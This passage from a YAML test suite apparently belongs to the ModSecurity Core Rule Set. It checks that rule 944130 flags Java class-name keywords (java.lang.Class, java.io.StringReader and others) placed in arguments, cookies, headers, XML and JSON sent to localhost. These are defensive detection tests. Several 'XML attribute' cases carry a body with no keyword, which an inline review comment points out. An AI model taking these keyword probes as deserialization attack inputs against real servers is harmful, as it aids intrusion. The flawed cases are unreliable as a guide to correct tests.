              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.Reader\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # Keyword java.io.StringReader: same eleven request locations.
  - test_title: 944130-253
    desc: "Argument test includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.StringReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-254
    desc: "Argument name includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.StringReader=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-255
    desc: "Cookie test includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.io.StringReader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-256
    desc: "Cookie name includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.io.StringReader=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-257
    desc: "Request header test includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.io.StringReader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): body as shown has no XML markup and no keyword; see the note
  # at the top of this block.
  - test_title: 944130-258
    desc: "XML attribute value includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-259
    desc: "XML element value includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.StringReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-260
    desc: "Nested XML element value includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.StringReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-261
    desc: "Content-Type text/plain includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.StringReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-262
    desc: "Content-Type application/json arg value includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.io.StringReader\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-263
    desc: "Content-Type application/json arg name includes keyword java.io.StringReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.StringReader\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # Keyword java.lang.Class: same eleven request locations.
  - test_title: 944130-264
    desc: "Argument test includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.Class"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-265
    desc: "Argument name includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Class=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-266
    desc: "Cookie test includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.lang.Class
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-267
    desc: "Cookie name includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.lang.Class=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-268
    desc: "Request header test includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.lang.Class
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): body as shown has no XML markup and no keyword; see the note
  # at the top of this block.
  - test_title: 944130-269
    desc: "XML attribute value includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-270
    desc: "XML element value includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Class"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-271
    desc: "Nested XML element value includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Class"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-272
    desc: "Content-Type text/plain includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.Class"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-273
    desc: "Content-Type application/json arg value includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.lang.Class\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-274
    desc: "Content-Type application/json arg name includes keyword java.lang.Class"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.lang.Class\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # Keyword java.lang.Integer: same eleven request locations.
  - test_title: 944130-275
    desc: "Argument test includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.Integer"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-276
    desc: "Argument name includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Integer=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-277
    desc: "Cookie test includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.lang.Integer
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-278
    desc: "Cookie name includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.lang.Integer=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-279
    desc: "Request header test includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.lang.Integer
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): body as shown has no XML markup and no keyword; see the note
  # at the top of this block.
  - test_title: 944130-280
    desc: "XML attribute value includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-281
    desc: "XML element value includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Integer"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-282
    desc: "Nested XML element value includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Integer"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-283
    desc: "Content-Type text/plain includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.Integer"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-284
    desc: "Content-Type application/json arg value includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.lang.Integer\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-285
    desc: "Content-Type application/json arg name includes keyword java.lang.Integer"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.lang.Integer\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # Keyword java.lang.Number: same eleven request locations.
  - test_title: 944130-286
    desc: "Argument test includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.Number"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-287
    desc: "Argument name includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Number=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-288
    desc: "Cookie test includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.lang.Number
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-289
    desc: "Cookie name includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.lang.Number=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-290
    desc: "Request header test includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.lang.Number
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): body as shown has no XML markup and no keyword; see the note
  # at the top of this block.
  - test_title: 944130-291
    desc: "XML attribute value includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-292
    desc: "XML element value includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Number"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-293
    desc: "Nested XML element value includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.lang.Number"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-294
    desc: "Content-Type text/plain includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.lang.Number"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-295
    desc: "Content-Type application/json arg value includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.lang.Number\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-296
    desc: "Content-Type application/json arg name includes keyword java.lang.Number"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
